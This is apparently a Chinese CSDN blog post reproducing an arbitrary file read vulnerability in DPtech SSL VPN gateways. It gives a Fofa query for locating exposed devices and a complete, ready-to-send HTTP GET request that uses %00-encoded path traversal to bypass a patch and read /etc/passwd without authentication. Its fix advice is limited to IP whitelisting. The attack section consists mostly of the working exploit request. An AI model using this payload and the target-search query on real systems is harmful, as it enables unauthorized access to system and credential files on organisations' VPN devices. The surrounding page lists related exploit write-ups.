某普SSLVPN 任意文件读取

于 2024-10-12 09:56:37 发布
阅读量313 收藏 1
点赞数 7
分类专栏: 漏洞复现 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142870080
版权

0x01 产品描述:

    迪普科技VPN产品是一款面向广域互联应用场景的专业安全网关产品,集成了IPSecSSLL2TPGRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问。‌ 该产品支持基于用户、应用的安全策略,提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能,可作为总部及分支机构的安全出口。迪普VPN还实现了集中管理、统一配置,集成ACPoE功能,支持3G/4G无线模块扩展,有效简化用户组网,降低运维成本‌

0x02 漏洞描述:

         迪普SSLVPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制,读取系统重要文件。

0x04 搜索语句:

Fofa:app="DPtech-SSLVPN"

0x05 漏洞复现:

GET /.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Accept: application/json, text/javascript, */*; q=0.01
Connection: close

 

0x06 修复建议:

增加ip白名单,限制非白名单中ip访问

iSee857
关注
专栏目录
迪普-SSL-VPN-任意文件读取
weixin_43567873的博客
03-09 369
迪普-SSL-VPN-任意文件读取
【漏洞复现】迪普-SSL-VPN-任意文件读取
知黑而守白
01-18 289
DPtech VPN是迪普科技面向广域互联应用场景推出的专业安全网关产品,集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问;支持基于用户、应用的安全策略,同时提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能,可作为总部及分支机构的安全出口;除此以外,实现了集中管理、统一配置,并集成AC和PoE功能,支持3G/4G无线模块扩展,可有效的简化用户组网,降低运维成本。
启明星辰-天清汉马VPN接口download任意文件读取
weixin_69678131的博客
07-24 913
FOFA:icon_hash="-15980305"app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"
DPtech SSL VPN Service任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-01 622
杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。这可能包括配置文件、敏感文档或其他敏感信息。成功利用此漏洞的攻击者可以获取系统敏感数据,可能导致横向扩展攻击、身份盗窃等风险。
迪普SSL VPN 任意文件读取漏洞复现(补丁绕过)
0xSec
09-10 238
迪普SSL VPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制,读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现--迪普DPTech VPN 任意文件读取
qq_53003652的博客
11-15 1321
杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件
Pulse Secure 任意文件读取(CVE-2019-11510)漏洞
aijin3040的博客
08-31 3000
漏洞分析 我们可以通过CVE-2019-11510这个未授权的任意文件读取漏洞把以下文件下载回来。 /etc/passwd /etc/hosts /data/runtime/mtmp/system /data/runtime/mtmp/lmdb/dataa/data.mdb /data/runtime/mtmp/lmdb/dataa/lock.mdb /data/run...
深信服SG上网优化管理系统存在任意文件读取漏洞 附POC
nnn2188185的博客
10-04 473
深信服SG上网优化管理系统 catjs.php接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件
【1day】复现深信服数据中心管理系统 XXE漏洞——可读取文件
记录并分享学习安全的知识点..
08-16 420
深信服的数据中心管理系统DC是一种外置的AC(异地扩展备份管理)数据中心,它提供了强大的功能和灵活性,旨在满足日志数据处理的需求。该系统具备多种高级功能,包括多条件组合的高效查询、统计和生成趋势报表,以及实时监控设备的运行状态等。深信服数据中心管理系统存在XXE漏洞。
历年HW已公开漏洞专集!(目前漏洞库更新至84个,Goby持续更新...)
m0_46699477的博客
07-11 1072
历年HW已公开漏洞专集!(目前漏洞库更新至84个,Goby持续更新...)。 截至2024年7月11日,Goby红队版已扩充以下历年HW已公开POC漏洞库,本次更新**84**个
2023年江西省职业院校技能大赛高职组 “信息安全管理与评估”赛项 任务书
Aluxian_的博客
10-11 466
A 集团发现其发布的 Web 应用程序遭到了恶意攻击,A 集团提供了 Web 应用程序的主要代码,您的团队需要协助 A 集团对该应用程序代码进行分析,找出存在的脆弱点。1.请获取 FTP 服务器上对应的F1文件进行分析,找出其中隐藏的flag,并将 flag 提交。2.请获取 FTP 服务器上对应的F2文件进行分析,找出其中隐藏的flag,并将 flag 提交。3.请获取 FTP 服务器上对应的F3文件进行分析,找出其中隐藏的flag,并将 flag 提交。
网络原理】TCP协议提高效率的秘密-滑动窗口机制
acm_pn的博客
10-11 838
滑动窗口机制的出现就是为了缓解TCP协议可靠传输带来的性能损失,用于在发送端和接收端之间管理数据流动的速度,通过 流量控制 与 拥塞控制 使窗口大小控制在一个合理的范围内,以避免接收端因处理能力不足而导致数据丢失或发送端因发送过快而导致网络拥塞,又通过 快速重传 产生了一种滑动的效果,尽可能的提高了传输的效率。
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)零基础入门到精通,收藏这一篇就够了_kalilinux
weixin_57514792的博客
10-07 1229
最新kali linux入门及常用简单工具介绍
项目管理-信息技术发展
GAVIN
10-04 734
对称加密:DES 3DES AES RC5 IEDA SM1 SM4。2)分类:PAN LAN MAN WAN 公用网 专用网。4)数据结构模型 层次模型 网状模型 关系模型。1)存储 分类:DAS FAS NAS SAN。物联网(IoT) 感知层 网络层 应用层。8) 5G 高速率 低时延 大连接。设备安全 数据安全 内容安全 行为安全。4.信息安全 保密性 完整性 可用性。3)网络协议 语法 语义 时许。5)IEEE 802 规范。6)TCP/IP 协议。4)网络标准协议 7层。
Macbook ToDesk 无法连接网络
Primer5
10-04 356
检查登录项,看到后台运行项目是关闭状态,允许后台运行之后返回查看立马显示网络连接正常。网络连接的是 Wi-Fi,打开浏览器能跟正常浏览内容,说明 Wi-Fi 是正常的。检查防火墙是没有阻止ToDesk 的任何连接,说明防火墙也是正常的。
IP数据包
permit7的博客
10-11 651
ARP协议是地址解析协议(Address Resolution Protocol)是通过解析IP地址得到MAC地址的,是一个在网络协议包中极其重要的网络传输协议,它与网卡有着极其密切的关系,在TCP/IP分层结构中,把ARP划分为网络层。
网络风暴产生原因、危害、预防和解决方法
luotuo28的博客
10-09 441
网络风暴是指由于某种原因引发的网络中数据流量急剧增加,导致网络性能严重下降甚至瘫痪的现象。
68 Netty
最新发布
fyh2944163240的博客
10-11 472
Netty 是一个高性能的异步事件驱动的网络应用框架,广泛用于开发网络应用程序,如协议服务器和客户端。简单来说这个框架是基于异步事件驱动的网络应用框架,这里最重要的一个点是事件驱动。何为事件驱动呢?事件驱动就是指它的服务逻辑都是针对发生的事件来触发的,一旦某个事件发生了,就会触发该时间的处理逻辑。比如建立连接、数据读取、数据写入等等情况。该应用框架总体来说就是为了两个服务直接进行通信,只不过这个是异步通信,而不是像之前那样的同步通信,它是非阻塞的,具有很高的性能。那么连接两个节点之间进行通信的称为通道。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
10-11 1301
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
linux连接sslvpn连接
09-16
在Linux系统上连接SSLVPN通常需要借助开源的OpenSSL工具库或者一些专门用于SSL连接的客户端软件,如OpenConnect、VPNC等。以下是基本步骤: 1. **安装必要的软件**:首先确保你的系统已经安装了OpenSSL。如果没有,可以使用包管理器如apt-get(Ubuntu/Debian)或yum(CentOS/RHEL)来安装: ``` sudo apt-get install openssl # Debian/Ubuntu sudo yum install openssl # CentOS/RHEL ``` 2. **下载SSLVPN客户端**:根据你的网络供应商提供的SSLVPN服务,选择相应的客户端。例如,对于Cisco AnyConnect Secure Mobility Client,可以从官方下载。 3. **配置客户端**:解压并运行安装程序,按照向导设置账号信息。通常会创建一个配置文件,其中包含服务器地址、用户名和密码等信息。 4. **连接到SSL隧道**:使用命令行(如OpenConnect)或图形界面启动SSL连接。例如使用OpenConnect: ```sh openconnect <your-vpn-server-url> -u <username> -p <password> ``` 或者使用vpnc + client插件(如strongswan): ```sh vpnc --connect <your-vpn-profile-name> ``` 5. **验证连接**:一旦连接成功,你会看到提示信息,可能还会有一些证书信任相关的提示。确认无误后,你就可以通过这个加密通道访问内部网络资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值